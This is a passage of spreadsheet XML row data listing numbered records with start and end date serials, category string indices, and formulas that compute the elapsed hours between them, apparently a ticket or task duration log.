      <c r="F226" s="1">
        <v>43697.784305555557</v>
      </c>
      <c r="G226" t="s">
        <v>37</v>
      </c>
      <c r="H226" t="str">
        <f>TEXT(F226-E226,"[h]")</f>
        <v>320</v>
      </c>
    </row>
    <row r="227" spans="1:8">
      <c r="A227" t="s">
        <v>1340</v>
      </c>
      <c r="B227">
        <v>14214</v>
      </c>
      <c r="C227" t="s">
        <v>1341</v>
      </c>
      <c r="D227" t="s">
        <v>7</v>
      </c>
      <c r="E227" s="1">
        <v>43684.027395833335</v>
      </c>
      <c r="F227" s="1">
        <v>43712.893576388888</v>
      </c>
      <c r="G227" t="s">
        <v>875</v>
      </c>
      <c r="H227" t="str">
        <f>TEXT(F227-E227,"[h]")</f>
        <v>692</v>
      </c>
    </row>
    <row r="228" spans="1:8">
      <c r="A228" t="s">
        <v>1342</v>
      </c>
      <c r="B228">
        <v>14213</v>
      </c>
      <c r="C228" t="s">
        <v>1343</v>
      </c>
      <c r="D228" t="s">
        <v>7</v>
      </c>
      <c r="E228" s="1">
        <v>43683.897060185183</v>
      </c>
      <c r="F228" s="1">
        <v>43684.705914351849</v>
      </c>
      <c r="G228" t="s">
        <v>1344</v>
      </c>
      <c r="H228" t="str">
        <f>TEXT(F228-E228,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="229" spans="1:8" hidden="1">
      <c r="A229" t="s">
        <v>1345</v>
      </c>
      <c r="B229">
        <v>14212</v>
      </c>
      <c r="C229" t="s">
        <v>1346</v>
      </c>
      <c r="D229" t="s">
        <v>7</v>
      </c>
      <c r="E229" s="1">
        <v>43683.784849537034</v>
      </c>
      <c r="F229" s="1">
        <v>43683.971724537034</v>
      </c>
      <c r="G229" t="s">
        <v>138</v>
      </c>
      <c r="H229" t="str">
        <f>TEXT(F229-E229,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="230" spans="1:8">
      <c r="A230" t="s">
        <v>1347</v>
      </c>
      <c r="B230">
        <v>14211</v>
      </c>
      <c r="C230" t="s">
        <v>1348</v>
      </c>
      <c r="D230" t="s">
        <v>7</v>
      </c>
      <c r="E230" s="1">
        <v>43683.712048611109</v>
      </c>
      <c r="F230" s="1">
        <v>43717.816319444442</v>
      </c>
      <c r="G230" t="s">
        <v>683</v>
      </c>
      <c r="H230" t="str">
        <f>TEXT(F230-E230,"[h]")</f>
        <v>818</v>
      </c>
    </row>
    <row r="231" spans="1:8">
      <c r="A231" t="s">
        <v>1349</v>
      </c>
      <c r="B231">
        <v>14209</v>
      </c>
      <c r="C231" t="s">
        <v>1350</v>
      </c>
      <c r="D231" t="s">
        <v>7</v>
      </c>
      <c r="E231" s="1">
        <v>43683.53869212963</v>
      </c>
      <c r="F231" s="1">
        <v>43713.725925925923</v>
      </c>
      <c r="G231" t="s">
        <v>22</v>
      </c>
      <c r="H231" t="str">
        <f>TEXT(F231-E231,"[h]")</f>
        <v>724</v>
      </c>
    </row>
    <row r="232" spans="1:8">
      <c r="A232" t="s">
        <v>1318</v>
      </c>
      <c r="B232">
        <v>14207</v>
      </c>
      <c r="C232" t="s">
        <v>1319</v>
      </c>
      <c r="D232" t="s">
        <v>7</v>
      </c>
      <c r="E232" s="1">
        <v>43683.385763888888</v>
      </c>
      <c r="F232" s="1">
        <v>43683.575578703705</v>
      </c>
      <c r="G232" t="s">
        <v>189</v>
      </c>
      <c r="H232" t="str">
        <f>TEXT(F232-E232,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="233" spans="1:8" hidden="1">
      <c r="A233" t="s">
        <v>1351</v>
      </c>
      <c r="B233">
        <v>14205</v>
      </c>
      <c r="C233" t="s">
        <v>1352</v>
      </c>
      <c r="D233" t="s">
        <v>7</v>
      </c>
      <c r="E233" s="1">
        <v>43683.186319444445</v>
      </c>
      <c r="F233" s="1">
        <v>43732.170902777776</v>
      </c>
      <c r="G233" t="s">
        <v>138</v>
      </c>
      <c r="H233" t="str">
        <f>TEXT(F233-E233,"[h]")</f>
        <v>1175</v>
      </c>
    </row>
    <row r="234" spans="1:8" hidden="1">
      <c r="A234" t="s">
        <v>1353</v>
      </c>
      <c r="B234">
        <v>14204</v>
      </c>
      <c r="C234" t="s">
        <v>1354</v>
      </c>
      <c r="D234" t="s">
        <v>7</v>
      </c>
      <c r="E234" s="1">
        <v>43682.854062500002</v>
      </c>
      <c r="F234" s="1">
        <v>43690.073321759257</v>
      </c>
      <c r="G234" t="s">
        <v>1355</v>
      </c>
      <c r="H234" t="str">
        <f>TEXT(F234-E234,"[h]")</f>
        <v>173</v>
      </c>
    </row>
    <row r="235" spans="1:8" hidden="1">
      <c r="A235" t="s">
        <v>1356</v>
      </c>
      <c r="B235">
        <v>14203</v>
      </c>
      <c r="C235" t="s">
        <v>1357</v>
      </c>
      <c r="D235" t="s">
        <v>7</v>
      </c>
      <c r="E235" s="1">
        <v>43682.850671296299</v>
      </c>
      <c r="F235" s="1">
        <v>43692.375057870369</v>
      </c>
      <c r="G235" t="s">
        <v>1358</v>
      </c>
      <c r="H235" t="str">
        <f>TEXT(F235-E235,"[h]")</f>
        <v>228</v>
      </c>
    </row>
    <row r="236" spans="1:8" hidden="1">
      <c r="A236" t="s">
        <v>1359</v>
      </c>
      <c r="B236">
        <v>14202</v>
      </c>
      <c r="C236" t="s">
        <v>1360</v>
      </c>
      <c r="D236" t="s">
        <v>7</v>
      </c>
      <c r="E236" s="1">
        <v>43682.734166666669</v>
      </c>
      <c r="F236" s="1">
        <v>43684.675694444442</v>
      </c>
      <c r="G236" t="s">
        <v>118</v>
      </c>
      <c r="H236" t="str">
        <f>TEXT(F236-E236,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="237" spans="1:8">
      <c r="A237" t="s">
        <v>1361</v>
      </c>
      <c r="B237">
        <v>14201</v>
      </c>
      <c r="C237" t="s">
        <v>1362</v>
      </c>
      <c r="D237" t="s">
        <v>7</v>
      </c>
      <c r="E237" s="1">
        <v>43682.565138888887</v>
      </c>
      <c r="F237" s="1">
        <v>43682.647997685184</v>
      </c>
      <c r="G237" t="s">
        <v>98</v>
      </c>
      <c r="H237" t="str">
        <f>TEXT(F237-E237,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="238" spans="1:8" hidden="1">
      <c r="A238" t="s">
        <v>1369</v>
      </c>
      <c r="B238">
        <v>14198</v>
      </c>
      <c r="C238" t="s">
        <v>1370</v>
      </c>
      <c r="D238" t="s">
        <v>7</v>
      </c>
      <c r="E238" s="1">
        <v>43682.551111111112</v>
      </c>
      <c r="F238" s="1">
        <v>43682.646354166667</v>
      </c>
      <c r="G238" t="s">
        <v>1371</v>
      </c>
      <c r="H238" t="str">
        <f>TEXT(F238-E238,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="239" spans="1:8" hidden="1">
      <c r="A239" t="s">
        <v>1372</v>
      </c>
      <c r="B239">
        <v>14196</v>
      </c>
      <c r="C239" t="s">
        <v>1373</v>
      </c>
      <c r="D239" t="s">
        <v>7</v>
      </c>
      <c r="E239" s="1">
        <v>43681.547199074077</v>
      </c>
      <c r="F239" s="1">
        <v>43681.679363425923</v>
      </c>
      <c r="G239" t="s">
        <v>445</v>
      </c>
      <c r="H239" t="str">
        <f>TEXT(F239-E239,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="240" spans="1:8" hidden="1">
      <c r="B240">
        <v>14195</v>
      </c>
      <c r="C240" t="s">
        <v>1374</v>
      </c>
      <c r="D240" t="s">
        <v>7</v>
      </c>
      <c r="E240" s="1">
        <v>43681.422256944446</v>
      </c>
      <c r="F240" s="1">
        <v>43681.56453703704</v>
      </c>
      <c r="G240" t="s">
        <v>1375</v>
      </c>
      <c r="H240" t="str">
        <f>TEXT(F240-E240,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="241" spans="1:8">
      <c r="A241" t="s">
        <v>1376</v>
      </c>
      <c r="B241">
        <v>14194</v>
      </c>
      <c r="C241" t="s">
        <v>1377</v>
      </c>
      <c r="D241" t="s">
        <v>7</v>
      </c>
      <c r="E241" s="1">
        <v>43681.02925925926</v>
      </c>
      <c r="F241" s="1">
        <v>43681.567280092589</v>
      </c>
      <c r="G241" t="s">
        <v>1378</v>
      </c>
      <c r="H241" t="str">
        <f>TEXT(F241-E241,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="242" spans="1:8">
      <c r="A242" t="s">
        <v>1379</v>
      </c>
      <c r="B242">
        <v>14191</v>
      </c>
      <c r="C242" t="s">
        <v>1380</v>
      </c>
      <c r="D242" t="s">
        <v>7</v>
      </c>
      <c r="E242" s="1">
        <v>43680.530682870369</v>
      </c>
      <c r="F242" s="1">
        <v>43713.725925925923</v>
      </c>
      <c r="G242" t="s">
        <v>123</v>
      </c>
      <c r="H242" t="str">
        <f>TEXT(F242-E242,"[h]")</f>
        <v>796</v>
      </c>
    </row>
    <row r="243" spans="1:8" hidden="1">
      <c r="A243" t="s">
        <v>1381</v>
      </c>
      <c r="B243">
        <v>14190</v>
      </c>
      <c r="C243" t="s">
        <v>1382</v>
      </c>
      <c r="D243" t="s">
        <v>7</v>
      </c>
      <c r="E243" s="1">
        <v>43680.387986111113</v>
      </c>
      <c r="F243" s="1">
        <v>43680.602476851855</v>
      </c>
      <c r="G243" t="s">
        <v>1383</v>
      </c>
      <c r="H243" t="str">
        <f>TEXT(F243-E243,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="244" spans="1:8">
      <c r="A244" t="s">
        <v>1384</v>
      </c>
      <c r="B244">
        <v>14189</v>
      </c>
      <c r="C244" t="s">
        <v>1385</v>
      </c>
      <c r="D244" t="s">
        <v>7</v>
      </c>
      <c r="E244" s="1">
        <v>43679.929814814815</v>
      </c>
      <c r="F244" s="1">
        <v>43723.535231481481</v>
      </c>
      <c r="G244" t="s">
        <v>1386</v>
      </c>
      <c r="H244" t="str">
        <f>TEXT(F244-E244,"[h]")</f>
        <v>1046</v>
      </c>
    </row>
    <row r="245" spans="1:8">
      <c r="A245" t="s">
        <v>1366</v>
      </c>
      <c r="B245">
        <v>14185</v>
      </c>
      <c r="C245" t="s">
        <v>1367</v>
      </c>
      <c r="D245" t="s">
        <v>7</v>
      </c>
      <c r="E245" s="1">
        <v>43679.572812500002</v>
      </c>
      <c r="F245" s="1">
        <v>43681.823842592596</v>
      </c>
      <c r="G245" t="s">
        <v>1368</v>
      </c>
      <c r="H245" t="str">
        <f>TEXT(F245-E245,"[h]")</f>
        <v>54</v>
      </c>
    </row>
    <row r="246" spans="1:8" hidden="1">
      <c r="A246" t="s">
        <v>1387</v>
      </c>
      <c r="B246">
        <v>14182</v>
      </c>
      <c r="C246" t="s">
        <v>1388</v>
      </c>
      <c r="D246" t="s">
        <v>7</v>
      </c>
      <c r="E246" s="1">
        <v>43679.178171296298</v>
      </c>
      <c r="F246" s="1">
        <v>43683.012673611112</v>
      </c>
      <c r="G246" t="s">
        <v>138</v>
      </c>
      <c r="H246" t="str">
        <f>TEXT(F246-E246,"[h]")</f>
        <v>92</v>
      </c>
    </row>
    <row r="247" spans="1:8" hidden="1">
      <c r="A247" t="s">
        <v>1389</v>
      </c>
      <c r="B247">
        <v>14181</v>
      </c>
      <c r="C247" t="s">
        <v>1390</v>
      </c>
      <c r="D247" t="s">
        <v>7</v>
      </c>
      <c r="E247" s="1">
        <v>43679.101921296293</v>
      </c>
      <c r="F247" s="1">
        <v>43685.480358796296</v>
      </c>
      <c r="G247" t="s">
        <v>536</v>
      </c>
      <c r="H247" t="str">
        <f>TEXT(F247-E247,"[h]")</f>
        <v>153</v>
      </c>
    </row>
    <row r="248" spans="1:8" hidden="1">
      <c r="A248" t="s">
        <v>1391</v>
      </c>
      <c r="B248">
        <v>14180</v>
      </c>
      <c r="C248" t="s">
        <v>1392</v>
      </c>
      <c r="D248" t="s">
        <v>7</v>
      </c>
      <c r="E248" s="1">
        <v>43679.090069444443</v>
      </c>
      <c r="F248" s="1">
        <v>43726.856527777774</v>
      </c>
      <c r="G248" t="s">
        <v>138</v>
      </c>
      <c r="H248" t="str">
        <f>TEXT(F248-E248,"[h]")</f>
        <v>1146</v>
      </c>
    </row>
    <row r="249" spans="1:8" hidden="1">
      <c r="A249" t="s">
        <v>1363</v>
      </c>
      <c r="B249">
        <v>14178</v>
      </c>
      <c r="C249" t="s">
        <v>1364</v>
      </c>
      <c r="D249" t="s">
        <v>7</v>
      </c>
      <c r="E249" s="1">
        <v>43678.706643518519</v>
      </c>
      <c r="F249" s="1">
        <v>43681.819826388892</v>
      </c>
      <c r="G249" t="s">
        <v>1365</v>
      </c>
      <c r="H249" t="str">
        <f>TEXT(F249-E249,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="250" spans="1:8">
      <c r="A250" t="s">
        <v>1393</v>
      </c>
      <c r="B250">
        <v>14171</v>
      </c>
      <c r="C250" t="s">
        <v>1394</v>
      </c>
      <c r="D250" t="s">
        <v>7</v>
      </c>
      <c r="E250" s="1">
        <v>43677.737916666665</v>
      </c>
      <c r="F250" s="1">
        <v>43678.90525462963</v>
      </c>
      <c r="G250" t="s">
        <v>16</v>
      </c>
      <c r="H250" t="str">
        <f>TEXT(F250-E250,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="251" spans="1:8" hidden="1">
      <c r="A251" t="s">
        <v>1395</v>
      </c>
      <c r="B251">
        <v>14170</v>
      </c>
      <c r="C251" t="s">
        <v>1396</v>
      </c>
      <c r="D251" t="s">
        <v>7</v>
      </c>
      <c r="E251" s="1">
        <v>43677.736331018517</v>
      </c>
      <c r="F251" s="1">
        <v>43682.602453703701</v>
      </c>
      <c r="G251" t="s">
        <v>373</v>
      </c>
      <c r="H251" t="str">
        <f>TEXT(F251-E251,"[h]")</f>
        <v>116</v>
      </c>
    </row>
    <row r="252" spans="1:8" hidden="1">
      <c r="A252" t="s">
        <v>1397</v>
      </c>
      <c r="B252">
        <v>14167</v>
      </c>
      <c r="C252" t="s">
        <v>1398</v>
      </c>
      <c r="D252" t="s">
        <v>7</v>
      </c>
      <c r="E252" s="1">
        <v>43676.929861111108</v>
      </c>
      <c r="F252" s="1">
        <v>43677.647638888891</v>
      </c>
      <c r="G252" t="s">
        <v>118</v>
      </c>
      <c r="H252" t="str">
        <f>TEXT(F252-E252,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="253" spans="1:8">
      <c r="A253" t="s">
        <v>1401</v>
      </c>
      <c r="B253">
        <v>14162</v>
      </c>
      <c r="C253" t="s">
        <v>1402</v>
      </c>
      <c r="D253" t="s">
        <v>7</v>
      </c>
      <c r="E253" s="1">
        <v>43676.552395833336</v>
      </c>
      <c r="F253" s="1">
        <v>43676.588020833333</v>
      </c>
      <c r="G253" t="s">
        <v>1403</v>
      </c>
      <c r="H253" t="str">
        <f>TEXT(F253-E253,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:8" hidden="1">
      <c r="A254" t="s">
        <v>1404</v>
      </c>
      <c r="B254">
        <v>14161</v>
      </c>
      <c r="C254" t="s">
        <v>1405</v>
      </c>
      <c r="D254" t="s">
        <v>7</v>
      </c>
      <c r="E254" s="1">
        <v>43675.901145833333</v>
      </c>
      <c r="F254" s="1">
        <v>43682.713252314818</v>
      </c>
      <c r="G254" t="s">
        <v>1406</v>
      </c>
      <c r="H254" t="str">
        <f>TEXT(F254-E254,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="255" spans="1:8">
      <c r="A255" t="s">
        <v>1407</v>
      </c>
      <c r="B255">
        <v>14160</v>
      </c>
      <c r="C255" t="s">
        <v>1408</v>
      </c>
      <c r="D255" t="s">
        <v>7</v>
      </c>
      <c r="E255" s="1">
        <v>43675.893229166664</v>
      </c>
      <c r="F255" s="1">
        <v>43675.966597222221</v>
      </c>
      <c r="G255" t="s">
        <v>98</v>
      </c>
      <c r="H255" t="str">
        <f>TEXT(F255-E255,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="256" spans="1:8">
      <c r="A256" t="s">
        <v>1409</v>
      </c>
      <c r="B256">
        <v>14159</v>
      </c>
      <c r="C256" t="s">
        <v>1410</v>
      </c>
      <c r="D256" t="s">
        <v>7</v>
      </c>
      <c r="E256" s="1">
        <v>43675.88863425926</v>
      </c>
      <c r="F256" s="1">
        <v>43675.966273148151</v>
      </c>
      <c r="G256" t="s">
        <v>1411</v>
      </c>
      <c r="H256" t="str">
        <f>TEXT(F256-E256,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="257" spans="1:8">
      <c r="A257" t="s">
        <v>1412</v>
      </c>
      <c r="B257">
        <v>14158</v>
      </c>
      <c r="C257" t="s">
        <v>1413</v>
      </c>
      <c r="D257" t="s">
        <v>7</v>
      </c>
      <c r="E257" s="1">
        <v>43675.884479166663</v>
      </c>
      <c r="F257" s="1">
        <v>43675.965879629628</v>
      </c>
      <c r="G257" t="s">
        <v>1403</v>
      </c>
      <c r="H257" t="str">
        <f>TEXT(F257-E257,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="258" spans="1:8" hidden="1">
      <c r="A258" t="s">
        <v>1416</v>
      </c>
      <c r="B258">
        <v>14153</v>
      </c>
      <c r="C258" t="s">
        <v>1417</v>
      </c>
      <c r="D258" t="s">
        <v>7</v>
      </c>
      <c r="E258" s="1">
        <v>43675.556018518517</v>
      </c>
      <c r="F258" s="1">
        <v>43675.662488425929</v>
      </c>
      <c r="G258" t="s">
        <v>103</v>
      </c>
      <c r="H258" t="str">
        <f>TEXT(F258-E258,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="259" spans="1:8">
      <c r="A259" t="s">
        <v>1414</v>
      </c>
      <c r="B259">
        <v>14152</v>
      </c>
      <c r="C259" t="s">
        <v>1415</v>
      </c>
      <c r="D259" t="s">
        <v>7</v>
      </c>
      <c r="E259" s="1">
        <v>43675.55195601852</v>
      </c>
      <c r="F259" s="1">
        <v>43675.661944444444</v>
      </c>
      <c r="G259" t="s">
        <v>16</v>
      </c>
      <c r="H259" t="str">
        <f>TEXT(F259-E259,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="260" spans="1:8">
      <c r="A260" t="s">
        <v>1418</v>
      </c>
      <c r="B260">
        <v>14145</v>
      </c>
      <c r="C260" t="s">
        <v>1419</v>
      </c>
      <c r="D260" t="s">
        <v>7</v>
      </c>
      <c r="E260" s="1">
        <v>43674.917048611111</v>
      </c>
      <c r="F260" s="1">
        <v>43676.944907407407</v>
      </c>
      <c r="G260" t="s">
        <v>1420</v>
      </c>
      <c r="H260" t="str">
        <f>TEXT(F260-E260,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="261" spans="1:8">
      <c r="A261" t="s">
        <v>1421</v>
      </c>
      <c r="B261">
        <v>14144</v>
      </c>
      <c r="C261" t="s">
        <v>1422</v>
      </c>
      <c r="D261" t="s">
        <v>7</v>
      </c>
      <c r="E261" s="1">
        <v>43674.902581018519</v>
      </c>
      <c r="F261" s="1">
        <v>43674.956388888888</v>
      </c>
      <c r="G261" t="s">
        <v>1423</v>
      </c>
      <c r="H261" t="str">
        <f>TEXT(F261-E261,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="262" spans="1:8">
      <c r="A262" t="s">
        <v>1424</v>
      </c>
      <c r="B262">
        <v>14143</v>
      </c>
      <c r="C262" t="s">
        <v>1425</v>
      </c>
      <c r="D262" t="s">
        <v>7</v>
      </c>
      <c r="E262" s="1">
        <v>43674.886122685188</v>
      </c>
      <c r="F262" s="1">
        <v>43674.947164351855</v>
      </c>
      <c r="G262" t="s">
        <v>849</v>
      </c>
      <c r="H262" t="str">
        <f>TEXT(F262-E262,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="263" spans="1:8" hidden="1">
      <c r="A263" t="s">
        <v>1316</v>
      </c>
      <c r="B263">
        <v>14141</v>
      </c>
      <c r="C263" t="s">
        <v>1317</v>
      </c>
      <c r="D263" t="s">
        <v>7</v>
      </c>
      <c r="E263" s="1">
        <v>43674.37091435185</v>
      </c>
      <c r="F263" s="1">
        <v>43685.92114583333</v>
      </c>
      <c r="G263" t="s">
        <v>222</v>
      </c>
      <c r="H263" t="str">
        <f>TEXT(F263-E263,"[h]")</f>
        <v>277</v>
      </c>
    </row>
    <row r="264" spans="1:8">
      <c r="A264" t="s">
        <v>1426</v>
      </c>
      <c r="B264">
        <v>14140</v>
      </c>
      <c r="C264" t="s">
        <v>1427</v>
      </c>
      <c r="D264" t="s">
        <v>7</v>
      </c>
      <c r="E264" s="1">
        <v>43673.700416666667</v>
      </c>
      <c r="F264" s="1">
        <v>43676.944907407407</v>
      </c>
      <c r="G264" t="s">
        <v>1428</v>
      </c>
      <c r="H264" t="str">
        <f>TEXT(F264-E264,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="265" spans="1:8">
      <c r="A265" t="s">
        <v>1429</v>
      </c>
      <c r="B265">
        <v>14138</v>
      </c>
      <c r="C265" t="s">
        <v>1430</v>
      </c>
      <c r="D265" t="s">
        <v>7</v>
      </c>
      <c r="E265" s="1">
        <v>43673.010972222219</v>
      </c>
      <c r="F265" s="1">
        <v>43700.598587962966</v>
      </c>
      <c r="G265" t="s">
        <v>1431</v>
      </c>
      <c r="H265" t="str">
        <f>TEXT(F265-E265,"[h]")</f>
        <v>662</v>
      </c>
    </row>
    <row r="266" spans="1:8" hidden="1">
      <c r="A266" t="s">
        <v>1432</v>
      </c>
      <c r="B266">
        <v>14135</v>
      </c>
      <c r="C266" t="s">
        <v>1433</v>
      </c>
      <c r="D266" t="s">
        <v>7</v>
      </c>
      <c r="E266" s="1">
        <v>43672.799328703702</v>
      </c>
      <c r="F266" s="1">
        <v>43672.889432870368</v>
      </c>
      <c r="G266" t="s">
        <v>118</v>
      </c>
      <c r="H266" t="str">
        <f>TEXT(F266-E266,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="267" spans="1:8" hidden="1">
      <c r="A267" t="s">
        <v>1434</v>
      </c>
      <c r="B267">
        <v>14134</v>
      </c>
      <c r="C267" t="s">
        <v>1435</v>
      </c>
      <c r="D267" t="s">
        <v>7</v>
      </c>
      <c r="E267" s="1">
        <v>43672.79923611111</v>
      </c>
      <c r="F267" s="1">
        <v>43674.957476851851</v>
      </c>
      <c r="G267" t="s">
        <v>90</v>
      </c>
      <c r="H267" t="str">
        <f>TEXT(F267-E267,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="268" spans="1:8" hidden="1">
      <c r="A268" t="s">
        <v>1436</v>
      </c>
      <c r="B268">
        <v>14133</v>
      </c>
      <c r="C268" t="s">
        <v>1437</v>
      </c>
      <c r="D268" t="s">
        <v>7</v>
      </c>
      <c r="E268" s="1">
        <v>43672.626458333332</v>
      </c>
      <c r="F268" s="1">
        <v>43672.668379629627</v>
      </c>
      <c r="G268" t="s">
        <v>592</v>
      </c>
      <c r="H268" t="str">
        <f>TEXT(F268-E268,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="269" spans="1:8">
      <c r="A269" t="s">
        <v>1438</v>
      </c>
      <c r="B269">
        <v>14132</v>
      </c>
      <c r="C269" t="s">
        <v>1439</v>
      </c>
      <c r="D269" t="s">
        <v>7</v>
      </c>
      <c r="E269" s="1">
        <v>43672.472442129627</v>
      </c>
      <c r="F269" s="1">
        <v>43678.90525462963</v>
      </c>
      <c r="G269" t="s">
        <v>1440</v>
      </c>
      <c r="H269" t="str">
        <f>TEXT(F269-E269,"[h]")</f>
        <v>154</v>
      </c>
    </row>
    <row r="270" spans="1:8">
      <c r="A270" t="s">
        <v>1441</v>
      </c>
      <c r="B270">
        <v>14131</v>
      </c>
      <c r="C270" t="s">
        <v>1442</v>
      </c>
      <c r="D270" t="s">
        <v>7</v>
      </c>
      <c r="E270" s="1">
        <v>43672.167581018519</v>
      </c>
      <c r="F270" s="1">
        <v>43726.609178240738</v>
      </c>
      <c r="G270" t="s">
        <v>1443</v>
      </c>
      <c r="H270" t="str">
        <f>TEXT(F270-E270,"[h]")</f>
        <v>1306</v>
      </c>
    </row>
    <row r="271" spans="1:8" hidden="1">
      <c r="A271" t="s">
        <v>1444</v>
      </c>
      <c r="B271">
        <v>14130</v>
      </c>
      <c r="C271" t="s">
        <v>1445</v>
      </c>
      <c r="D271" t="s">
        <v>7</v>
      </c>
      <c r="E271" s="1">
        <v>43672.086493055554</v>
      </c>
      <c r="F271" s="1">
        <v>43672.108171296299</v>
      </c>
      <c r="G271" t="s">
        <v>445</v>
      </c>
      <c r="H271" t="str">
        <f>TEXT(F271-E271,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="272" spans="1:8" hidden="1">
      <c r="A272" t="s">
        <v>1446</v>
      </c>
      <c r="B272">
        <v>14124</v>
      </c>
      <c r="C272" t="s">
        <v>1447</v>
      </c>
      <c r="D272" t="s">
        <v>7</v>
      </c>
      <c r="E272" s="1">
        <v>43671.972361111111</v>
      </c>
      <c r="F272" s="1">
        <v>43672.020509259259</v>
      </c>
      <c r="G272" t="s">
        <v>1448</v>
      </c>
      <c r="H272" t="str">
        <f>TEXT(F272-E272,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="273" spans="1:8" hidden="1">
      <c r="A273" t="s">
        <v>1457</v>
      </c>
      <c r="B273">
        <v>14122</v>
      </c>
      <c r="C273" t="s">
        <v>1458</v>
      </c>
      <c r="D273" t="s">
        <v>7</v>
      </c>
      <c r="E273" s="1">
        <v>43671.938460648147</v>
      </c>
      <c r="F273" s="1">
        <v>43672.014826388891</v>
      </c>
      <c r="G273" t="s">
        <v>28</v>
      </c>
      <c r="H273" t="str">
        <f>TEXT(F273-E273,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="274" spans="1:8">
      <c r="A274" t="s">
        <v>1459</v>
      </c>
      <c r="B274">
        <v>14121</v>
      </c>
      <c r="C274" t="s">
        <v>1460</v>
      </c>
      <c r="D274" t="s">
        <v>7</v>
      </c>
      <c r="E274" s="1">
        <v>43671.927222222221</v>
      </c>
      <c r="F274" s="1">
        <v>43674.83152777778</v>
      </c>
      <c r="G274" t="s">
        <v>16</v>
      </c>
      <c r="H274" t="str">
        <f>TEXT(F274-E274,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="275" spans="1:8" hidden="1">
      <c r="A275" t="s">
        <v>1461</v>
      </c>
      <c r="B275">
        <v>14117</v>
      </c>
      <c r="C275" t="s">
        <v>1462</v>
      </c>
      <c r="D275" t="s">
        <v>7</v>
      </c>
      <c r="E275" s="1">
        <v>43671.558599537035</v>
      </c>
      <c r="F275" s="1">
        <v>43692.367592592593</v>
      </c>
      <c r="G275" t="s">
        <v>115</v>
      </c>
      <c r="H275" t="str">
        <f>TEXT(F275-E275,"[h]")</f>
        <v>499</v>
      </c>
    </row>
    <row r="276" spans="1:8" hidden="1">
      <c r="A276" t="s">
        <v>1463</v>
      </c>
      <c r="B276">
        <v>14116</v>
      </c>
      <c r="C276" t="s">
        <v>1464</v>
      </c>
      <c r="D276" t="s">
        <v>7</v>
      </c>
      <c r="E276" s="1">
        <v>43671.557002314818</v>
      </c>
      <c r="F276" s="1">
        <v>43672.276597222219</v>
      </c>
      <c r="G276" t="s">
        <v>1465</v>
      </c>
      <c r="H276" t="str">
        <f>TEXT(F276-E276,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="277" spans="1:8" hidden="1">
      <c r="A277" t="s">
        <v>1466</v>
      </c>
      <c r="B277">
        <v>14115</v>
      </c>
      <c r="C277" t="s">
        <v>1467</v>
      </c>
      <c r="D277" t="s">
        <v>7</v>
      </c>
      <c r="E277" s="1">
        <v>43671.512106481481</v>
      </c>
      <c r="F277" s="1">
        <v>43677.735451388886</v>
      </c>
      <c r="G277" t="s">
        <v>1468</v>
      </c>
      <c r="H277" t="str">
        <f>TEXT(F277-E277,"[h]")</f>
        <v>149</v>
      </c>
    </row>
    <row r="278" spans="1:8" hidden="1">
      <c r="A278" t="s">
        <v>1469</v>
      </c>
      <c r="B278">
        <v>14114</v>
      </c>
      <c r="C278" t="s">
        <v>1470</v>
      </c>
      <c r="D278" t="s">
        <v>7</v>
      </c>
      <c r="E278" s="1">
        <v>43671.481053240743</v>
      </c>
      <c r="F278" s="1">
        <v>43673.063715277778</v>
      </c>
      <c r="G278" t="s">
        <v>1468</v>
      </c>
      <c r="H278" t="str">
        <f>TEXT(F278-E278,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="279" spans="1:8" hidden="1">
      <c r="A279" t="s">
        <v>1471</v>
      </c>
      <c r="B279">
        <v>14113</v>
      </c>
      <c r="C279" t="s">
        <v>1472</v>
      </c>
      <c r="D279" t="s">
        <v>7</v>
      </c>
      <c r="E279" s="1">
        <v>43671.391631944447</v>
      </c>
      <c r="F279" s="1">
        <v>43671.396655092591</v>
      </c>
      <c r="G279" t="s">
        <v>201</v>
      </c>
      <c r="H279" t="str">
        <f>TEXT(F279-E279,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="280" spans="1:8" hidden="1">
      <c r="A280" t="s">
        <v>1473</v>
      </c>
      <c r="B280">
        <v>14112</v>
      </c>
      <c r="C280" t="s">
        <v>1474</v>
      </c>
      <c r="D280" t="s">
        <v>7</v>
      </c>
      <c r="E280" s="1">
        <v>43671.10359953704</v>
      </c>
      <c r="F280" s="1">
        <v>43730.009432870371</v>
      </c>
      <c r="G280" t="s">
        <v>157</v>
      </c>
      <c r="H280" t="str">
        <f>TEXT(F280-E280,"[h]")</f>
        <v>1413</v>
      </c>
    </row>
    <row r="281" spans="1:8" hidden="1">
      <c r="A281" t="s">
        <v>1475</v>
      </c>
      <c r="B281">
        <v>14110</v>
